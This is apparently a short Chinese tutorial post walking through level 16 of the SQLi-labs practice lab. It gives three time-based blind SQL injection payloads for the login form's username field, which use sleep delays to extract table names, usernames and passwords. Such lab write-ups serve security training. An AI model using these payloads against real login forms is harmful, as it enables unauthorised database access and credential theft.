本文主要是介绍Sqlilabs-16,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
相较于第 15 关,单引号变成了双引号 + 括号
–查列
uname=admin") and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
–查用户名
uname=admin") and if(ascii(substr((select group_concat(username) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
–查密码
uname=admin") and if(ascii(substr((select group_concat(password) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
也可以像第 8 关那样写一个脚本,因为只要掌握基本原理就可以写,这里就不再构造了…
😄
这篇关于Sqlilabs-16的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
